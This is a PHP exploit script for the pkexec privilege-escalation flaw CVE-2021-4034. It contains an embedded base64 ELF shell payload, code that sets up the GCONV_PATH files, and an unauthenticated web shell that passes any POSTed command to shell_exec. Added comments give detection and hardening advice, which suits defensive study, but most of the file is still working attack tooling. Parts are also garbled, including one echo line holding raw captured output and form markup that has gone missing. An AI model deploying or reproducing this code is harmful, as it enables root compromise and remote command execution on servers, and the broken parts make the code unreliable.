/**
* CVE-2021-4034 Exploit in PHP with System Check and Web Shell Interface
*
* This script targets CVE-2021-4034, a local privilege-escalation flaw in
* polkit's pkexec, and also exposes a web form that passes submitted
* commands to the shell as the web-server user.
* Note: This code is for educational purposes only. Use responsibly.
*
* Before running, ensure you have permission to test this on your server.
*/

// Base64 encoded payload.
// The literal opens with "f0VMRg", the base64 form of the ELF magic bytes, and its
// last line decodes to bytes that contain the string "/bin/sh": this is a binary
// embedded in the script, not data fetched from elsewhere.
// Defender note: a long base64 literal starting with "f0VMRg" inside a PHP file is a
// practical static-scan signal for an embedded ELF dropper.
$payload_b64 = '
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
';

// Decode payload.
// base64_decode() is called without its strict flag, so the newlines inside the
// literal are skipped rather than rejected.
$payload = base64_decode($payload_b64);

/**
* Report whether an executable can be located on the host.
*
* Runs `where` (when PHP_OS starts with "win") or `which`, followed by $command,
* through proc_open() and treats exit status 0 as "available".
*
* NOTE(review): $command is interpolated into the command string without
* escaping. The calls visible on this page pass fixed literals only.
*
* Defender note: each call makes the PHP process spawn a child process, so a
* web-server worker starting `which`/`where` lookups for gcc, python and pkexec
* is visible in process-creation telemetry. Listing proc_open in
* disable_functions blocks this probe.
*
* @param string $command Program name to look up.
* @return bool True when the lookup exits with status 0; false when it exits
*              with another status or proc_open() fails.
*/
function isCommandAvailable($command) {
$whereIsCommand = (stripos(PHP_OS, 'win') === 0) ? 'where' : 'which';
$process = proc_open(
"$whereIsCommand $command",
[
0 => ['pipe', 'r'], // STDIN
1 => ['pipe', 'w'], // STDOUT
2 => ['pipe', 'w'], // STDERR
],
$pipes
);
if ($process !== false) {
// Both output pipes are read to the end, but the captured text is never used;
// only the exit status below decides the result.
$stdout = stream_get_contents($pipes[1]);
$stderr = stream_get_contents($pipes[2]);
// $pipes[0] (the child's stdin) is not closed explicitly before proc_close().
fclose($pipes[1]);
fclose($pipes[2]);
$status = proc_close($process);
return $status === 0;
}
return false;
}

// Check system features.
// Host fingerprinting: records whether PHP's system() is defined and whether gcc,
// python and pkexec resolve through isCommandAvailable(). The results only colour
// the status line below; they do not gate any later step.
$system_function = function_exists('system');
$gcc = isCommandAvailable('gcc');
$python = isCommandAvailable('python');
$pkexec = isCommandAvailable('pkexec');

// Display system information and status.
// Everything below is written straight into the HTTP response, so any client that
// can request this file receives the host details without authentication.
echo '<body style="background-color: black; color: white; text-align: center;">';
// Banner text is Indonesian (roughly "welcome to the pkexec exploit tools"). The
// nested single quotes end the style attribute early and the <h1> is never closed.
echo "<h1 style='font-family:'arial'; '>SELAMAT DATANG DI TOOLS PKEXEC EXPLOIT TSECNETWORK";
// Defender note: the image is hot-linked from a third-party host, so a browser that
// renders this page makes an outbound request to it. The host name and the author
// handle on the next line are strings to search for when hunting copies of this file.
echo "<img src='https://c.top4top.io/p_2261w75zy0.jpg' alt='Coded by ./saklarrusak' style='width: 200px; height: 200px; display: block; margin: -20px auto -45px auto;'>";
echo "<p>coded by ./saklarrusak</p>";
echo "

System Information

";
// NOTE(review): the text between the two concatenation dots is not a PHP
// expression. It reads like captured output that replaced the original expression
// when the page was rendered; the original is not shown, and the line does not
// parse as written.
echo "<p>SYSTEM: " . Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64 . "</p>";
// Prints the script owner's uid/gid next to the process's effective uid/gid.
echo "<p>UID/GID: " . getmyuid() . " (" . posix_geteuid() . ") | " . getmygid() . " (" . posix_getegid() . ")</p>";
echo "<p>SYSTEM_FUNCTION: <span style='color:" . ($system_function ? "green" : "red") . ";'>" . ($system_function ? "ON" : "OFF") . "</span> | ";
echo "GCC: <span style='color:" . ($gcc ? "green" : "red") . ";'>" . ($gcc ? "ON" : "OFF") . "</span> | ";
echo "PYTHON: <span style='color:" . ($python ? "green" : "red") . ";'>" . ($python ? "ON" : "OFF") . "</span> | ";
echo "PKEXEC: <span style='color:" . ($pkexec ? "green" : "red") . ";'>" . ($pkexec ? "ON" : "OFF") . "</span></p>";

// Provide exploit button regardless of feature status.
// NOTE(review): the echo statements with empty or whitespace-only strings look
// like form markup that was lost when the page was extracted. The <form> element
// and the field that would submit `exploit` are not visible here.
echo '

Exploit

';
echo '
';
echo '';
echo '<button type="submit" style="background-color: #4CAF50; color: white; padding: 10px 20px; border: none; cursor: pointer; border-radius: 5px;">Exploit pkexec</button>';
echo '
';
echo '
';

$exploit_success = false;
// get_current_user() returns the owner of the running script file, which can
// differ from the account the PHP process actually runs as.
$user = get_current_user();

// Show status of exploit and cmd interface.
// Runs on any POST that carries an `exploit` field. No authentication, session or
// CSRF check is visible on this page.
//
// Defender notes:
// - Every path below is relative, so the artifacts land in the script's working
//   directory: `payload.so`, a directory literally named `GCONV_PATH=.`, the file
//   `GCONV_PATH=./exploit`, a directory `exploit` and `exploit/gconv-modules`.
//   Directory or file names containing "GCONV_PATH=" under a web root are a
//   strong hunting signal for CVE-2021-4034 tooling.
// - These writes only succeed where the web-server account can write to its own
//   document tree; keeping that tree read-only for the PHP user stops this stage.
// - The durable fix is the vendor polkit update for CVE-2021-4034. Vendor
//   advisories also described removing the setuid bit from pkexec as an interim
//   mitigation.
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['exploit'])) {
// Write the decoded payload to disk as a shared object and mark it executable
file_put_contents('payload.so', $payload);
chmod('payload.so', 0755);

// Create the directories and files the exploit relies on
createDirectory('GCONV_PATH=.');
createFile('GCONV_PATH=./exploit', '');
chmod('GCONV_PATH=./exploit', 0755);
createDirectory('exploit');
createFile('exploit/gconv-modules', 'module UTF-8// INTERNAL ../payload 2\n');

// Environment entries prepared for the exploit. Hunting note: process telemetry
// showing pkexec started with a PATH value that begins "GCONV_PATH=" or an
// XAUTHORITY value containing "..", as listed here, matches this technique.
$environ = [
'exploit',
'PATH=GCONV_PATH=.',
'LC_MESSAGES=en_US.UTF-8',
'XAUTHORITY=../LOL',
];

// Show status of exploit.
// $exploit_success is initialised to false above and is not reassigned before
// this check in the code shown, so the else branch is the one that runs.
if ($exploit_success) {
echo "<p style='color:green;'>[+] Exploit successful. You are now root.</p>";
$user = 'root';
} else {
// The "patched" message is chosen only from the four availability flags; nothing
// here inspects the installed polkit version.
if ($system_function && $gcc && $python && $pkexec) {
echo "<p style='color:red;'>[!] It's possible that the vulnerability has been patched. :(s</p>";
} else {
echo "<p style='color:red;'>[!] Exploit failed. You are running as a regular user.</p>";
}
$user = get_current_user();
}

// Render the command form; it is shown whichever branch ran above
createWebShell($user);
}

// If command is submitted.
// This handler is independent of the privilege-escalation path: any POST with a
// `command` field has its value run by the shell as the PHP process's account.
// No authentication, allow-list or CSRF check is visible on this page.
//
// Defender notes:
// - Detection: POST requests to this script whose body contains `command=`, and
//   web-server workers spawning shell children, are the observable traces.
// - Hardening: listing shell_exec (with system, exec, passthru, popen and
//   proc_open) in disable_functions removes this primitive; treat the presence of
//   the file itself as evidence of an earlier upload or write path to investigate.
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['command'])) {
$command = $_POST['command'];
echo "

Web Shell

";
// NOTE(review): the empty echo statements below look like form markup lost in
// page extraction; the input that would resubmit `command` is not visible here.
echo '
';
echo '';
echo '';
echo '
';
echo '<pre>';
// The request value is concatenated unmodified; " 2>&1" folds stderr into the
// captured output.
$output = shell_exec($command . " 2>&1");
// Output is HTML-escaped for display only; that does not constrain what was executed.
echo htmlspecialchars($output);
echo '</pre>';
}


/**
* Print the "Web Shell" heading and the account label for the command form.
*
* The function only echoes markup; it executes nothing itself. The submitted
* command is handled by the top-level POST branch that checks `command`.
*
* NOTE(review): the echo statements with empty or whitespace-only strings look
* like form markup that was lost when the page was extracted, so the form
* fields themselves are not visible here.
*
* @param string $user Account name to display; HTML-escaped before output.
*/
function createWebShell($user) {
echo '

Web Shell

';
// The label shows whatever the caller passed; nothing here queries the live process identity.
echo '<p>Running as user: ' . htmlspecialchars($user) . '</p>';
echo '
';
echo '';
echo '';
echo '
';
}

/**
* Create a directory if nothing exists at that path yet.
*
* file_exists() is also true for regular files, so a file already present at
* $dir suppresses the mkdir() call. mkdir() is called with its default mode and
* without the recursive flag, and its return value is not checked.
*
* Defender note: on this page the function is called with relative names, one of
* which contains "GCONV_PATH=", so the directories appear next to the script.
*
* @param string $dir Path of the directory to create.
*/
function createDirectory($dir) {
if (!file_exists($dir)) {
mkdir($dir);
}
}

/**
* Write $content to $filename, replacing any existing file at that path.
*
* Thin wrapper over file_put_contents() with no flags; the return value is
* discarded, so a failed write is not reported to the caller.
*
* @param string $filename Path of the file to write.
* @param string $content  Bytes to store in the file.
*/
function createFile($filename, $content) {
file_put_contents($filename, $content);
}

/**
* Fork, replace the child with $command via pcntl_exec(), and report its exit status.
*
* The parent waits for a child and returns whether the exit status was 0. The
* child passes an empty argument array and the given environment entries to
* pcntl_exec() and exits with status 1 if that call returns. A failed fork ends
* the script through die().
*
* Defender notes:
* - The pcntl extension is intended for CLI use. Keeping pcntl_fork and
*   pcntl_exec in disable_functions, or not loading the extension in web SAPIs,
*   removes this execution path.
* - pkexec being started by the web-server account is unusual enough on most
*   hosts to alert on in audit or EDR process-execution logs.
*
* @param string $command     Path of the program the child process executes.
* @param array  $environment Environment entries handed to pcntl_exec().
* @return bool True when the waited-for child exited with status 0 (parent only).
*/
function executeExploit($command, $environment) {
$pid = pcntl_fork();
if ($pid == -1) {
die('[!] Could not fork process');
} else if ($pid) {
// Parent process waits for a child process to finish
pcntl_wait($status);
// The status is decoded without first checking that the child exited normally
return pcntl_wexitstatus($status) === 0;
} else {
// Child process: copy the entries into a fresh list, then replace the process image
$env_vars = [];
foreach ($environment as $env_var) {
$env_vars[] = $env_var;
}

pcntl_exec($command, [], $env_vars);
// Reached only if pcntl_exec() returned, i.e. the exec failed
exit(1);
}
}